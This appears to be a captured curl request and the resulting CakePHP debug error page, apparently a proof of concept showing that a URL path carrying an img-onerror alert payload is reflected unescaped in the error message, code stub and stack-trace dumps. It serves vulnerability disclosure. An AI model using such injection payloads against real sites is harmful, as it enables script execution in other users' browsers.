$ curl -k "https://cake.localhost.com/tasks/aaa%27;%3Cimg%20src=%27a%27%20onerror=%27alert%28%22XSS%22%29%27/" | |
<!DOCTYPE html> | |
<html> | |
<head> | |
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title> | |
CakePHP: the rapid development php framework: | |
Errors </title> | |
<link href="/favicon.ico" type="image/x-icon" rel="icon" /><link href="/favicon.ico" type="image/x-icon" rel="shortcut icon" /><link rel="stylesheet" type="text/css" href="/css/cake.generic.css" /></head> | |
<body> | |
<div id="container"> | |
<div id="header"> | |
<h1><a href="http://cakephp.org">CakePHP: the rapid development php framework</a></h1> | |
</div> | |
<div id="content"> | |
<h2>Missing Method in TasksController</h2> <p class="error"> | |
<strong>Error: </strong> | |
The action <em>aaa';<img src='a' onerror='alert("XSS")'</em> is not defined in controller <em>TasksController</em></p> | |
<p class="error"> | |
<strong>Error: </strong> | |
Create <em>TasksController::</em><em>aaa';<img src='a' onerror='alert("XSS")'()</em> in file: app/Controller/TasksController.php.</p> | |
<pre> | |
<?php | |
class TasksController extends AppController { | |
<strong> | |
public function aaa';<img src='a' onerror='alert("XSS")'() { | |
} | |
</strong> | |
} | |
</pre> | |
<p class="notice"> | |
<strong>Notice: </strong> | |
If you want to customize this error message, create app/View/Errors/missing_action.ctp</p> | |
<h3>Stack Trace</h3> | |
<ul class="cake-stack-trace"> | |
<li><a href="#" onclick="traceToggle(event, 'file-excerpt-0')">CORE/Cake/Routing/Dispatcher.php line 187</a> → <a href="#" onclick="traceToggle(event, 'trace-args-0')">Controller->invokeAction(CakeRequest)</a> <div id="file-excerpt-0" class="cake-code-dump" style="display:none;"><pre><code><span style="color: #000000"><span style="color: #0000BB"> $controller</span><span style="color: #007700">-></span><span style="color: #0000BB">startupProcess</span><span style="color: #007700">();</span></span></code> | |
<code><span style="color: #000000"><span style="color: #0000BB"></span></span></code> | |
<code><span style="color: #000000"><span style="color: #0000BB"> $render </span><span style="color: #007700">= </span><span style="color: #0000BB">true</span><span style="color: #007700">;</span></span></code> | |
<span class="code-highlight"><code><span style="color: #000000"><span style="color: #0000BB"> $result </span><span style="color: #007700">= </span><span style="color: #0000BB">$controller</span><span style="color: #007700">-></span><span style="color: #0000BB">invokeAction</span><span style="color: #007700">(</span><span style="color: #0000BB">$request</span><span style="color: #007700">);</span></span></code></span> | |
<code><span style="color: #000000"><span style="color: #0000BB"> </span><span style="color: #007700">if (</span><span style="color: #0000BB">$result </span><span style="color: #007700">instanceof </span><span style="color: #0000BB">CakeResponse</span><span style="color: #007700">) {</span></span></code></pre></div> <div id="trace-args-0" class="cake-code-dump" style="display: none;"><pre>object(CakeRequest) { | |
params => array( | |
[maximum depth reached] | |
) | |
data => array([maximum depth reached]) | |
query => array([maximum depth reached]) | |
url => 'tasks/aaa%27;%3Cimg%20src=%27a%27%20onerror=%27alert%28%22XSS%22%29%27/' | |
base => '' | |
webroot => '/' | |
here => '/tasks/aaa%27;%3Cimg%20src=%27a%27%20onerror=%27alert%28%22XSS%22%29%27/' | |
[protected] _detectors => array( | |
[maximum depth reached] | |
) | |
[protected] _input => '' | |
}</pre></div></li> | |
<li><a href="#" onclick="traceToggle(event, 'file-excerpt-1')">CORE/Cake/Routing/Dispatcher.php line 162</a> → <a href="#" onclick="traceToggle(event, 'trace-args-1')">Dispatcher->_invoke(TasksController, CakeRequest, CakeResponse)</a> <div id="file-excerpt-1" class="cake-code-dump" style="display:none;"><pre><code><span style="color: #000000"><span style="color: #0000BB"> </span><span style="color: #007700">));</span></span></code> | |
<code><span style="color: #000000"><span style="color: #0000BB"> </span><span style="color: #007700">}</span></span></code> | |
<code><span style="color: #000000"><span style="color: #0000BB"></span></span></code> | |
<span class="code-highlight"><code><span style="color: #000000"><span style="color: #0000BB"> $response </span><span style="color: #007700">= </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">_invoke</span><span style="color: #007700">(</span><span style="color: #0000BB">$controller</span><span style="color: #007700">, </span><span style="color: #0000BB">$request</span><span style="color: #007700">, </span><span style="color: #0000BB">$response</span><span style="color: #007700">);</span></span></code></span> | |
<code><span style="color: #000000"><span style="color: #0000BB"> </span><span style="color: #007700">if (isset(</span><span style="color: #0000BB">$request</span><span style="color: #007700">-></span><span style="color: #0000BB">params</span><span style="color: #007700">[</span><span style="color: #DD0000">'return'</span><span style="color: #007700">])) {</span></span></code></pre></div> <div id="trace-args-1" class="cake-code-dump" style="display: none;"><pre>object(TasksController) { | |
uses => array([maximum depth reached]) | |
name => 'Tasks' | |
helpers => array([maximum depth reached]) | |
request => object(CakeRequest) {} | |
response => object(CakeResponse) {} | |
viewPath => 'Tasks' | |
layoutPath => null | |
viewVars => array([maximum depth reached]) | |
view => 'aaa';<img src='a' onerror='alert("XSS")'' | |
layout => 'default' | |
autoRender => true | |
autoLayout => true | |
Components => object(ComponentCollection) {} | |
components => array( | |
[maximum depth reached] | |
) | |
viewClass => 'View' | |
View => null | |
ext => '.ctp' | |
plugin => null | |
cacheAction => false | |
passedArgs => array([maximum depth reached]) | |
scaffold => false | |
methods => array( | |
[maximum depth reached] | |
) | |
modelClass => 'Task' | |
modelKey => 'task' | |
validationErrors => null | |
Session => object(SessionComponent) {} | |
[protected] _responseClass => 'CakeResponse' | |
[protected] _mergeParent => 'AppController' | |
[protected] _eventManager => object(CakeEventManager) {} | |
} | |
object(CakeRequest) { | |
params => array( | |
[maximum depth reached] | |
) | |
data => array([maximum depth reached]) | |
query => array([maximum depth reached]) | |
url => 'tasks/aaa%27;%3Cimg%20src=%27a%27%20onerror=%27alert%28%22XSS%22%29%27/' | |
base => '' | |
webroot => '/' | |
here => '/tasks/aaa%27;%3Cimg%20src=%27a%27%20onerror=%27alert%28%22XSS%22%29%27/' | |
[protected] _detectors => array( | |
[maximum depth reached] | |
) | |
[protected] _input => '' | |
} | |
object(CakeResponse) { | |
[protected] _statusCodes => array( | |
[maximum depth reached] | |
) | |
[protected] _mimeTypes => array( | |
[maximum depth reached] | |
) | |
[protected] _protocol => 'HTTP/1.1' | |
[protected] _status => (int) 200 | |
[protected] _contentType => 'text/html' | |
[protected] _headers => array([maximum depth reached]) | |
[protected] _body => null | |
[protected] _file => null | |
[protected] _fileRange => null | |
[protected] _charset => 'UTF-8' | |
[protected] _cacheDirectives => array([maximum depth reached]) | |
[protected] _cookies => array([maximum depth reached]) | |
}</pre></div></li> | |
<li><a href="#" onclick="traceToggle(event, 'file-excerpt-2')">APP/webroot/index.php line 110</a> → <a href="#" onclick="traceToggle(event, 'trace-args-2')">Dispatcher->dispatch(CakeRequest, CakeResponse)</a> <div id="file-excerpt-2" class="cake-code-dump" style="display:none;"><pre><code><span style="color: #000000"><span style="color: #0000BB">$Dispatcher</span><span style="color: #007700">-></span><span style="color: #0000BB">dispatch</span><span style="color: #007700">(</span></span></code> | |
<code><span style="color: #000000"><span style="color: #0000BB"> </span><span style="color: #007700">new </span><span style="color: #0000BB">CakeRequest</span><span style="color: #007700">(),</span></span></code> | |
<code><span style="color: #000000"><span style="color: #0000BB"> </span><span style="color: #007700">new </span><span style="color: #0000BB">CakeResponse</span><span style="color: #007700">()</span></span></code> | |
<span class="code-highlight"><code><span style="color: #000000"><span style="color: #0000BB"></span><span style="color: #007700">);</span></span></code></span> | |
<code><span style="color: #000000"><span style="color: #0000BB"></span></span></code></pre></div> <div id="trace-args-2" class="cake-code-dump" style="display: none;"><pre>object(CakeRequest) { | |
params => array( | |
[maximum depth reached] | |
) | |
data => array([maximum depth reached]) | |
query => array([maximum depth reached]) | |
url => 'tasks/aaa%27;%3Cimg%20src=%27a%27%20onerror=%27alert%28%22XSS%22%29%27/' | |
base => '' | |
webroot => '/' | |
here => '/tasks/aaa%27;%3Cimg%20src=%27a%27%20onerror=%27alert%28%22XSS%22%29%27/' | |
[protected] _detectors => array( | |
[maximum depth reached] | |
) | |
[protected] _input => '' | |
} | |
object(CakeResponse) { | |
[protected] _statusCodes => array( | |
[maximum depth reached] | |
) | |
[protected] _mimeTypes => array( | |
[maximum depth reached] | |
) | |
[protected] _protocol => 'HTTP/1.1' | |
[protected] _status => (int) 200 | |
[protected] _contentType => 'text/html' | |
[protected] _headers => array([maximum depth reached]) | |
[protected] _body => null | |
[protected] _file => null | |
[protected] _fileRange => null | |
[protected] _charset => 'UTF-8' | |
[protected] _cacheDirectives => array([maximum depth reached]) | |
[protected] _cookies => array([maximum depth reached]) | |
}</pre></div></li> | |
</ul> | |
<script type="text/javascript"> | |
/**
 * Toggles the visibility of one stack-trace excerpt / argument dump panel.
 *
 * @param {Event}  event  the click event; its default action is suppressed
 * @param {string} id     id of the element whose display is toggled
 * @returns {boolean} always false, so inline onclick handlers also cancel navigation
 */
function traceToggle(event, id) {
    var target = document.getElementById(id);
    // Only an explicit 'block' counts as shown; any other value (including '') is treated as hidden.
    if (target.style.display === 'block') {
        target.style.display = 'none';
    } else {
        target.style.display = 'block';
    }
    event.preventDefault();
    return false;
}
</script> | |
</div> | |
<div id="footer"> | |
<a href="http://www.cakephp.org/" target="_blank"><img src="/img/cake.power.gif" alt="CakePHP: the rapid development php framework" border="0" /></a> </div> | |
</div> | |
</body> | |
</html> |